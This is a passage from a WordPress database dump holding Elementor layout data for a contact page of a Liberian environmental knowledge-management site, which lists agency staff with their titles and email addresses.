Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23454,3411,'_elementor_edit_mode','builder'),(23455,3411,'_elementor_template_type','wp-page'),(23456,3411,'_elementor_version','3.0.16'),(23457,3411,'_wp_page_template','default'),(23458,3411,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 